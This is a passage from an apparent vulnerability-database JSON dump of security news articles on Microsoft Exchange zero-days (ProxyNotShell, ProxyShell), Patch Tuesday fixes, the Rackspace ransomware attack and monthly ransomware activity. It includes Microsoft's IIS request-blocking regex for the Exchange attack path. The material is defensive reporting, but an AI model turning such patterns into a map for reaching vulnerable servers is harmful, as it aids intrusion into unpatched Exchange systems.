([CVE-2022-37966](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37966>)), and Microsoft Exchange Server ([CVE-2022-41080](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41080>)), and a denial-of-service flaw affecting Windows Hyper-V ([CVE-2022-38015](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-38015>)).\n\nThe list of fixes for Critical flaws is rounded out by four remote code execution vulnerabilities in the Point-to-Point Tunneling Protocol ([PPTP](<https://en.wikipedia.org/wiki/Point-to-Point_Tunneling_Protocol>)), all carrying CVSS scores of 8.1 ([CVE-2022-41039](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41039>), [CVE-2022-41088](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41088>), and [CVE-2022-41044](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41044>)), and another impacting Windows scripting languages JScript9 and Chakra ([CVE-2022-41118](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-41118>)).\n\nIn addition to these issues, the Patch Tuesday update also resolves a number of remote code execution flaws in Microsoft Excel, Word, ODBC Driver, Office Graphics, SharePoint Server, and Visual Studio, as well as a handful of privilege escalation bugs in Win32k, Overlay Filter, and Group Policy.\n\n### Software Patches from Other Vendors\n\nMicrosoft aside, security updates have also been released by other vendors since the start of the month to rectify several vulnerabilities, including \u2014\n\n * [AMD](<https://www.amd.com/en/corporate/product-security>)\n * [Android](<https://source.android.com/docs/security/bulletin/2022-11-01>)\n * [Apple](<https://support.apple.com/en-us/HT213496>)\n * [Cisco](<https://tools.cisco.com/security/center/publicationListing.x>)\n * 
[Citrix](<https://support.citrix.com/search/#/All%20Products?ct=Software%20Updates,Security%20Bulletins&searchText=&sortBy=Modified%20date&pageIndex=1>)\n * [CODESYS](<https://www.codesys.com/security/security-reports.html>)\n * [Dell](<https://www.dell.com/support/security/>)\n * [F5](<https://support.f5.com/csp/new-updated-articles>)\n * [Fortinet](<https://www.fortiguard.com/psirt?date=11-2022>)\n * [GitLab](<https://about.gitlab.com/releases/2022/11/02/security-release-gitlab-15-5-2-released/>)\n * [Google Chrome](<https://chromereleases.googleblog.com/2022/11/stable-channel-update-for-desktop.html>)\n * [HP](<https://support.hp.com/us-en/security-bulletins>)\n * [IBM](<https://www.ibm.com/support/pages/bulletin/>)\n * [Intel](<https://www.intel.com/content/www/us/en/security-center/default.html>)\n * [Juniper Networks](<https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=date%20descending&f:ctype=\\[Security%20Advisories\\]>)\n * [Lenovo](<https://support.lenovo.com/us/en/product_security/ps500001-lenovo-product-security-advisories>)\n * Linux distributions [Debian](<https://www.debian.org/security/2022/>), [Oracle Linux](<https://linux.oracle.com/ords/f?p=105:21::::RP::>), [Red Hat](<https://access.redhat.com/security/security-updates/#/security-advisories?q=&p=1&sort=portal_publication_date%20desc&rows=10&portal_advisory_type=Security%20Advisory&documentKind=PortalProduct>), [SUSE](<https://www.suse.com/support/update/>), and [Ubuntu](<https://ubuntu.com/security/notices>)\n * [MediaTek](<https://corp.mediatek.com/product-security-bulletin/November-2022>)\n * [NVIDIA](<https://www.nvidia.com/en-us/security/>)\n * [Qualcomm](<https://docs.qualcomm.com/product/publicresources/securitybulletin/november-2022-bulletin.html>)\n * [SAP](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>)\n * [Schneider Electric](<https://www.se.com/ww/en/work/support/cybersecurity/security-notifications.jsp>)\n * 
[Siemens](<https://new.siemens.com/global/en/products/services/cert.html#SecurityPublications>)\n * [Trend Micro](<https://success.trendmicro.com/dcx/s/vulnerability-response?language=en_US>)\n * [VMware](<https://www.vmware.com/security/advisories.html>), and\n * [WordPress](<https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-09T05:16:00", "type": "thn", "title": "Install Latest Windows Update ASAP! 
Patches Issued for 6 Actively Exploited Zero-Days", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-3723", "CVE-2022-37966", "CVE-2022-37967", "CVE-2022-38015", "CVE-2022-41039", "CVE-2022-41040", "CVE-2022-41044", "CVE-2022-41049", "CVE-2022-41073", "CVE-2022-41080", "CVE-2022-41082", "CVE-2022-41088", "CVE-2022-41091", "CVE-2022-41118", "CVE-2022-41125", "CVE-2022-41128"], "modified": "2022-12-21T07:24:53", "id": "THN:31DAA0B9538D69BB42EFB6567298FF49", "href": "https://thehackernews.com/2022/11/install-latest-windows-update-asap.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackread": [{"lastseen": "2022-10-03T06:04:27", "description": "By [Deeba Ahmed](<https://www.hackread.com/author/deeba/>)\n\nThe latest attack against Exchange servers utilizes at least two new flaws (CVE-2022-41040, CVE-2022-41082) that have been assigned CVSS scores of 6.3 and 8.8.\n\nThis is a post from HackRead.com Read the original post: [Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers](<https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/>)", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T17:56:35", "type": "hackread", "title": "Microsoft Confirms Two 0-Days Being Exploited Against Exchange Servers", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T17:56:35", "id": "HACKREAD:E34C6E8908AE56B0B1176B1237BFDF36", "href": "https://www.hackread.com/microsoft-confirms-0-days-exchange-servers/", "cvss": {"score": 0.0, "vector": "NONE"}}], "malwarebytes": [{"lastseen": 
"2022-10-05T00:04:37", "description": "Microsoft has issued some [customer guidance](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) as it investigates (yes, more) reported vulnerabilities in Microsoft Exchange Server, affecting the 2013, 2016, and 2019 versions of the software. The company says it \"is aware of limited targeted attacks using the two vulnerabilities to get into users' systems.\" The move follows discussion online about whether two new Exchange [zero-days](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) are really new vulnerabilities, or just [new exploits for known vulnerabilities](<https://doublepulsar.com/proxynotshell-the-story-of-the-claimed-zero-day-in-microsoft-exchange-5c63d963a9e9>).\n\nSo, let's start with the most important part: What should you do if you're tasked with administering an Exchange Server? Microsoft is working on an accelerated timeline to release a fix. In the meantime it's providing mitigations and detection guidance:\n\nMicrosoft Exchange Online Customers do not need to take any action.\n\n## Update October 4, 2022\n\nMicrosoft has [adapted the mitigation advice](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>) it provided originally to block attacks on these vulnerabilities, because they were too easy to circumvent. The most significant change is the recommendation for Exchange Server customers to disable remote PowerShell access for non-admin users in your organization. 
Guidance on how to do this for a single user or multiple users is [here](<https://learn.microsoft.com/en-us/powershell/exchange/control-remote-powershell-access-to-exchange-servers?view=exchange-ps%22%20\\\\l%20%22use-the-exchange-management-shell-to-enable-or-disable-remote-powershell-access-for-a-user>). Microsoft also removed the option to block the ports that are used for Remote PowerShell, but doesn't mention this in the updates section.\n\nSome experts are promoting a more effective string to use in the Request Blocking instructions as shown under points 7 and 8 below. The change is minimal, but should be a significant improvement.\n\n`.*autodiscover\\.json.*Powershell.*`\n\nThese were the original instructions:\n\nUsers of the on-premises product should add a blocking rule in IIS Manager to block the known attack patterns. According to Microsoft, the following URL Rewrite instructions, which are currently being discussed publicly, are successful in breaking current attack chains:\n\n 1. Open the IIS Manager.\n 2. Expand the Default Web Site.\n 3. Select Autodiscover.\n 4. In the Feature View, click URL Rewrite.\n 5. In the Actions pane on the right-hand side, click Add Rules. \n 6. Select Request Blocking and click OK.\n 7. Add String `.*autodiscover\\.json.*\\@.*Powershell.*` and click OK.\n 8. Expand the rule and select the rule with the Pattern `.*autodiscover\\.json.*\\@.*Powershell.*` and click Edit under Conditions.\n 9. Change the condition input from {URL} to {REQUEST_URI}\n\nThe instructions above can be found on the [Microsoft blog](<https://msrc-blog.microsoft.com/2022/09/29/customer-guidance-for-reported-zero-day-vulnerabilities-in-microsoft-exchange-server/>), with screenshots. 
It adds that there is no known impact to Exchange functionality if the URL Rewrite module is installed as recommended.\n\nAnother option is to block the ports that are used for Remote PowerShell--**HTTP: 5985** and **HTTPS: 5986**.\n\n## The vulnerabilities\n\nThe vulnerabilities were discovered by [GTSC](<https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html>) while performing security monitoring and incident response services. It was able to assess that the attacks were based on exploit requests with the same format as ProxyShell. But the servers being attacked had all the latest updates, including those that stop ProxyShell.\n\nThe attacks were used to drop web shells on the Exchange servers--scripts that can be used by an attacker to run remote commands and maintain persistent access on an already compromised computer.\n\nAccording to security researcher [Kevin Beaumont](<https://twitter.com/GossiTheDog/status/1575580072961982464>), a significant number of Exchange servers have been backdoored. But he adds that this is not unusual, since the patching process is apparently such a mess that people end up on old Content Updates and don't patch ProxyShell properly.\n\nOn his blog on the subject he points out that if you don't run Microsoft Exchange on-premises, and don't have Outlook Web App (OWA) facing the internet, you are not impacted either. In addition, Microsoft also notes that attackers need authenticated access to the vulnerable Exchange Server in order to exploit either of the two vulnerabilities associated with these attacks.\n\nThe vulnerabilities, which are chained together, are:\n\n[CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>), a Server-Side Request Forgery (SSRF) vulnerability. 
SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to other services within an organization's infrastructure.\n\n[CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), a vulnerability that allows remote code execution (RCE) when PowerShell is accessible to the attacker.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T13:00:00", "type": "malwarebytes", "title": "[updated]Two new Exchange Server zero-days in the wild", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-09-30T13:00:00", "id": "MALWAREBYTES:DDF3883C3A8B9A70629872FE83522C17", "href": "https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-08T16:24:17", "description": "It's not been a great week for cloud computing service provider Rackspace.\n\nOn December 2, customers began experiencing problems connecting and logging into their Exchange environments. Rackspace started [investigating](<https://status.apps.rackspace.com/index/viewincidents?group=2>) and discovered an issue that affected its Hosted Exchange environments. \n\nNow Rackspace has announced it was actually a ransomware incident that caused the service disruptions.\n\nWhile the investigation is ongoing, there are no details known about which ransomware is at play or how the threat actor gained initial access. 
In a [press release](<https://www.rackspace.com/newsroom/rackspace-technology-hosted-exchange-environment-update>) Rackspace said that the incident was isolated to its Hosted Exchange business. Rackspace has not shown up on any of the known leak sites that ransomware groups use to apply extra pressure on their victims, but this could also be due to the fact that there are ongoing negotiations.\n\n## Hosted Exchange\n\nRackspace's Hosted Exchange customers are mostly small to medium-sized businesses that don't have the need or staff to run a dedicated on-premise Exchange server. The outage still affects all services in its Hosted Exchange environment, including MAPI/RPC, POP, IMAP, SMTP, and ActiveSync, as well as the Outlook Web Access (OWA) interface that provides access to online email management.\n\n## Workaround\n\nRackspace said it will help affected customers implement a temporary forwarding while the disruption is ongoing:\n\n> "As a temporary solution while you set up Microsoft 365, it is possible to also implement a forwarding option that will allow mail destined for a Hosted Exchange user to be routed to an external email address. Please log in to your customer account for a ticket with instructions to request this option. Customers should reply to the ticket to request the forwarding rule be put into place for each of their users."\n\n## Impact\n\nIn an [8-K SEC filing](<https://www.sec.gov/ix?doc=/Archives/edgar/data/0001810019/000119312522298940/d388117d8k.htm>) Rackspace states that it expects a loss of revenue due to the ransomware attack's impact on its $30 million Hosted Exchange business. 
An 8-K form is required to report any events concerning a company that could be of importance to the shareholders of that company or the Securities and Exchange Commission (SEC).\n\n## The attack vector\n\nOne possible attack vector was [pointed out by security researcher Kevin Beaumont](<https://doublepulsar.com/rackspace-cloud-office-suffers-security-breach-958e6c755d7f>). It might be due to exploitation of the Microsoft Exchange vulnerabilities tracked as [CVE-2022-41040 and CVE-2022-41082](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>), known as ProxyNotShell.\n\nBeaumont found a Rackspace Exchange server cluster--currently offline--was running a build number from August 2022 a few days prior to the incident disclosure. Since the ProxyNotShell vulnerabilities were only fixed in November, it's possible that threat actors exploited the flaws to breach Rackspace servers.\n\nOne important conclusion Beaumont notes in his post is:\n\n> "For a [managed service provider (MSP)](<https://www.malwarebytes.com/partners/managed-service-providers>) running a shared cluster, such as Hosted Exchange, it means that one compromised account of one customer will compromise the entire hosted cluster."\n\nThis is what may have happened at Rackspace. Don't let it happen to you.\n\n* * *\n\n**We don't just report on threats--we remove them**\n\nCybersecurity risks should never spread beyond a headline. 
Keep threats off your devices by [downloading Malwarebytes today](<https://www.malwarebytes.com/for-home>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-08T12:00:00", "type": "malwarebytes", "title": "Rackspace confirms it suffered a ransomware attack", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41040", "CVE-2022-41082"], "modified": "2022-12-08T12:00:00", "id": "MALWAREBYTES:B0C4B025BF22D777A196390CAE7FC07F", "href": "https://www.malwarebytes.com/blog/news/2022/12/rackspace-confirms-it-suffered-a-ransomware-attack", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-10-13T00:05:49", "description": "Microsoft fixed 84 vulnerabilities in its October 2022 Patch Tuesday updates. Thirteen of them received the classification 'Critical'. Among them are a zero-day vulnerability that's being actively exploited, and another that hasn't been spotted in the wild yet.\n\nThe bad news is that the much-desired fix for the \"ProxyNotShell\" [Exchange vulnerabilities](<https://www.malwarebytes.com/blog/news/2022/09/two-new-exchange-zero-days-that-look-and-feel-like-proxyshell-part-2>) was not included.\n\n## What was fixed\n\nA widely accepted [definition for a zero-day](<https://en.wikipedia.org/wiki/Zero-day_\\(computing\\)>) is a computer-software vulnerability previously unknown to those who should be interested in its mitigation, such as the software vendor. 
Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, computers or a network.\n\nAs such, a publicly known vulnerability is called a zero-day even if there is no known actively used exploitation for it.\n\nThe actively exploited vulnerability in this month's batch is [CVE-2022-41033](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41033>), a vulnerability with a [CVSS score](<https://www.malwarebytes.com/blog/news/2020/05/how-cvss-works-characterizing-and-scoring-vulnerabilities>) of 7.8 out of 10. This is described as a 'Windows COM+ Event System Service Elevation of Privileges (EoP)' vulnerability, which gives an attacker the potential to obtain SYSTEM privileges after successful exploitation.\n\nThis type of vulnerability usually comes into play once an attacker has gained an initial foothold on a system. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.\n\nAnother publicly disclosed vulnerability that gets a fix is [CVE-2022-41043](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41043>), a Microsoft Office Information Disclosure vulnerability. Affected products are Microsoft Office LTSC for Mac 2021 and Microsoft Office 2019 for Mac. Microsoft says attackers could use this vulnerability to gain access to users' authentication tokens.\n\n## What wasn't fixed\n\nThe Exchange Server \"ProxyNotShell\" vulnerabilities, [CVE-2022-41040](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41040>) and [CVE-2022-41082](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41082>), were not fixed in this round of updates. One is a Server-Side Request Forgery (SSRF) vulnerability and the other a remote code execution (RCE) vulnerability that exists when PowerShell is accessible to the attacker. The two can be chained together into an attack.\n\nMicrosoft says it will release updates for these vulnerabilities when they are ready. 
In the meantime, you should read [this blog post](<https://techcommunity.microsoft.com/t5/exchange-team-blog/customer-guidance-for-reported-zero-day-vulnerabilities-in/ba-p/3641494>) to learn about mitigations for those vulnerabilities.\n\n## Other vendors\n\nOther vendors have synchronized their periodic updates with Microsoft. Here are a few major ones:\n\n * Adobe released [security updates](<Adobe%20also%20released%20security%20updates%20to%20fix%2029%20vulnerabilities>) to fix 29 vulnerabilities in several products.\n * Apple published [iOS 16.0.3](<https://support.apple.com/en-us/HT213480>).\n * Fortinet released important [security updates](<https://www.bleepingcomputer.com/news/security/fortinet-warns-admins-to-patch-critical-auth-bypass-bug-immediately/>).\n * Google patched several vulnerabilities for [Android](<https://www.malwarebytes.com/blog/news/2022/10/vulnerabilities-in-google-android-could-allow-for-arbitrary-code-execution>).\n * Samsung has started rolling out October 2022 [security updates](<https://androidstories.com/2022/10/12/samsung-2022-security-update-rolling-out-for-these-galaxy-phones/>) for some of its devices.\n * SAP has released [updates](<https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10>) for several of its products.\n * VMware published security advisory [VMSA-2022-0025](<https://www.vmware.com/security/advisories/VMSA-2022-0025.html>).\n * Xiaomi released the October 2022 [Security Patch Update tracker](<https://xiaomiui.net/xiaomi-october-2022-security-patch-update-tracker-36308/>).\n\nThat should be enough to keep you busy, get patching!", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", 
"userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-10-12T17:45:00", "type": "malwarebytes", "title": "Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41033", "CVE-2022-41040", "CVE-2022-41043", "CVE-2022-41082"], "modified": "2022-10-12T17:45:00", "id": "MALWAREBYTES:A165959E3A462AF8315F01F1020BBF53", "href": "https://www.malwarebytes.com/blog/news/2022/10/update-now-october-patch-tuesday-fixes-actively-used-zero-day", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-03T00:13:33", "description": "_Malwarebytes Threat Intelligence builds a monthly picture of ransomware activity by monitoring the information published by ransomware gangs on their dark web leak sites. This information represents victims who were successfully attacked but opted not to pay a ransom._\n\nLockbit has rebounded from its unusual fall from grace in November, snatching the title of the month's worst ransomware, [back from Royal](<https://www.malwarebytes.com/blog/threat-intelligence/2023/01/ransomware-in-november-2022>). Royal has meanwhile still shown itself as a force to be reckoned with, ranking third in number of attacks for December. \n\n Known ransomware attacks by gang in December 2022\n\nAttacks by Royal may be down 35 percent from their high of 49 in November, but at the same time, there's good reason to suspect that their attacks are becoming more targeted. \n\nOn December 07, 2022, the Health Sector Cybersecurity Coordination Center (HC3)--an arm of the US Department of Health and Human Services (HHS)--[released a threat brief ](<https://www.hhs.gov/sites/default/files/royal-ransomware-analyst-note.pdf>)about Royal after observing the group disproportionately targeting the healthcare industry. 
Their crowning attack for December came late in the month when they breached [telecommunications company Intrado](<https://www.bleepingcomputer.com/news/security/royal-ransomware-claims-attack-on-intrado-telecom-provider/>).\n\n Known ransomware attacks by industry sector in December 2022\n\n Known ransomware attacks by country in December 2022\n\nIn terms of progress, the two newcomers that we introduced last month, Play and Project Relic, have vastly different stories to tell. \n\nProject Relic has fallen off the map while Play has turned up the jets--we recorded a whopping 136 percent increase in attacks from the gang compared to November. Since our last update Play has been seen leveraging a never-before-seen exploit chain, which might be responsible for their sharp uptick in attacks. The new Microsoft Exchange attack, dubbed ['OWASSRF'](<https://duo.com/decipher/play-ransomware-group-using-new-proxynotshell-exploit>), chains exploits for [CVE-2022-41082](<https://nvd.nist.gov/vuln/detail/cve-2022-41082>) and [CVE-2022-41080](<https://nvd.nist.gov/vuln/detail/CVE-2022-41080>) to gain initial access to corporate networks. This was the technique behind a ransomware attack on [cloud computing service provider Rackspace](<https://www.malwarebytes.com/blog/news/2022/12/rackspace-confirms-it-suffered-a-ransomware-attack>) in early December, which Play later claimed responsibility for. \n\nPlay's surge in activity, however, was hardly an anomaly for December. Month-on-month we saw hefty percentage-point increases in attacks across the board.\n\nALPHV (aka BlackCat), for example, is a ransomware gang that has consistently topped the charts in our ransomware reviews; the number of their attacks in December (33), however, is not only a 70 percent increase from November but also the highest it has been in all of 2022. We also saw 25 percent and 116 percent increases from BianLian and BlackBasta, respectively. 
These upticks are perhaps to be expected, [given that attackers famously love the holiday](<https://www.malwarebytes.com/blog/news/2022/11/how-to-stay-secure-from-ransomware-attacks-this-labor-day-weekend>) seasons due to the reduction in security staff on deck. Only time will tell if ransomware gangs will sustain their heightened levels of activity into the New Year--or if the increase is indeed simply a gift-wrapped aberration.\n\n## Lockbit\u2026 apologizes?\n\nLockbit in December regained the throne as the biggest ransomware gang by attack volume, reversing a three-month downward trend in number of victims.\n\nThe prolific ransomware group claimed on December 12 to have stolen up to 75GB of confidential data from [California's Department of Finance](<https://www.bleepingcomputer.com/news/security/lockbit-claims-attack-on-californias-department-of-finance/>), or over 246,000 files in more than 114,000 folders. Not even [SickKids](<https://www.bleepingcomputer.com/news/security/ransomware-gang-apologizes-gives-sickkids-hospital-free-decryptor/>) (a hospital for sick children) was spared from LockBit's avarice in December. A ransomware attack using LockBit impacted the hospital's internal and corporate systems, hospital phone lines, and website.\n\nWhile we're not surprised to [see a gang stoop to such lows](<https://www.malwarebytes.com/blog/business/2020/10/healthcare-security-death-by-ransomware>), we don't find many issuing apologies after the fact. Two days later LockBit apologized for the attack, which it blamed on a rogue affiliate, and released a decryptor for free. 
\n\nLockBit's operation's policy states \"It is forbidden to encrypt institutions where damage to the files could lead to death, such as cardiology centers, neurosurgical departments, maternity hospitals and the like, that is, those institutions where surgical procedures on high-tech equipment using computers may be performed.\"\n\nOf course the apology doesn't turn LockBit into some kind of Robin Hood. Its business model is to inflict so much harm that people are willing to pay a fortune to make it stop.\n\n## New ransomware gangs\n\n### Unsafe\n\nIn December, we saw a group emerge that makes its cash by riding on the coattails of real ransomware gangs. \n\nThe new player, Unsafe, seems to recycle leaks from other ransomware groups. Unsafe provides security blogs for cybercriminals to post victims and leaked data as well as consultation services for a fee. It currently lists eight victims. \n\n### Endurance\n\nWe call them ransomware _gangs_ for a reason: These are groups of cybercriminals working together in a hierarchical organization. Rarely do we ever see lone wolf attacks, and if we do it's even more unusual for them to make as big a splash in so short a time as Endurance has.\n\nThis cybercriminal, known on dark web forums as IntelBroker, tends to make individual posts about data on sale.\n\nIn less than 30 days since its inception, Endurance appears to have successfully infiltrated some big corporations and breached several US government entities. 
After posting some high-value victims, Endurance has removed them from its dark web site, which is \"undergoing development\".\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-01T17:15:00", "type": "malwarebytes", "title": "Ransomware in December 2022", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-41080", "CVE-2022-41082"], "modified": "2023-02-01T17:15:00", "id": "MALWAREBYTES:44E8550360FE68D55DE72F8F97C79C77", "href": "https://www.malwarebytes.com/blog/threat-intelligence/2023/02/ransomware-in-december-2022", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-08-23T18:35:00", "description": "Last Saturday the Cybersecurity and Infrastructure Security Agency issued an [urgent warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/08/21/urgent-protect-against-active-exploitation-proxyshell>) that threat actors are actively exploiting three Microsoft Exchange vulnerabilities\u2014[CVE-2021-34473](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34473>), [CVE-2021-34523](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34523>), and [CVE-2021-31207](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31207>). These vulnerabilities can be chained together to remotely execute arbitrary code on a vulnerable machine.\n\nThis set of Exchange vulnerabilities is often grouped under the name ProxyShell. Fixes were available in the [May 2021 Security Updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-May>) issued by Microsoft. 
(To be more precise, the first two were patched in April and CVE-2021-31207 was patched in May.)\n\n### The attack chain\n\nSimply explained, these three vulnerabilities can be chained together to allow a remote attacker to run code on the unpatched server. Attackers use them as follows:\n\n * **Get in** with CVE-2021-31207, a Microsoft Exchange Server security feature bypass vulnerability. The vulnerability allows a remote user to bypass the authentication process.\n * **Take control** with CVE-2021-34523, a Microsoft Exchange Server elevation of privilege (EoP) vulnerability. The vulnerability allows a user to raise their permissions.\n * **Do bad things** with CVE-2021-34473, a Microsoft Exchange Server remote code execution (RCE) vulnerability. The vulnerability allows an authenticated user to execute arbitrary code in the context of SYSTEM and write arbitrary files.\n\n### ProxyShell\n\nThe Record reports that ProxyShell has been used to [take over some 2,000 Microsoft Exchange mail servers](<https://therecord.media/almost-2000-exchange-servers-hacked-using-proxyshell-exploit/>) in just two days. This can only happen where organisations use the on-premise version of Exchange, and system administrators haven't installed the April and May patches.\n\nWe know there are many reasons why patching is difficult, and often slow. The high number is surprising though, given the noise level about Microsoft Exchange vulnerabilities has been high since [March](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>). 
It may have been muffled, though, by the other alarm cries about PrintNightmare, HiveNightmare, PetitPotam, and many others.\n\n### Ransomware\n\nSeveral researchers have pointed to a ransomware group named LockFile that combines ProxyShell with [PetitPotam](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/07/microsoft-provides-more-mitigation-instructions-for-the-petitpotam-attack/>). [Kevin Beaumont](<https://twitter.com/GossiTheDog>) has documented how his Exchange honeypot detected exploitation by ProxyShell to drop a [webshell](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>). Later, the threat actor revisited to initiate the staging of artefacts related to the LockFile ransomware. For those interested in how to identify whether their servers are vulnerable, and technical details about the stages in this attack, we highly recommend you read [Kevin Beaumont\u2019s post](<https://doublepulsar.com/multiple-threat-actors-including-a-ransomware-gang-exploiting-exchange-proxyshell-vulnerabilities-c457b1655e9c>).\n\n### PetitPotam\n\nBefore we can point out how ProxyShell can lead to a full blown network-wide ransomware infection we ought to tell you more about PetitPotam. PetitPotam enables a threat actor to launch an NTLM relay attack on domain controllers.\n\nPetitPotam uses the `EfsRpcOpenFileRaw` function of the Microsoft Encrypting File System Remote Protocol (MS-EFSRPC) API. MS-EFSRPC is used for maintenance and management operations on encrypted data that is stored remotely, and accessible over a network. The PetitPotam proof-of-concept (PoC) takes the form of a manipulator-in-the-middle (MitM) attack against Microsoft\u2019s NTLM authentication system. 
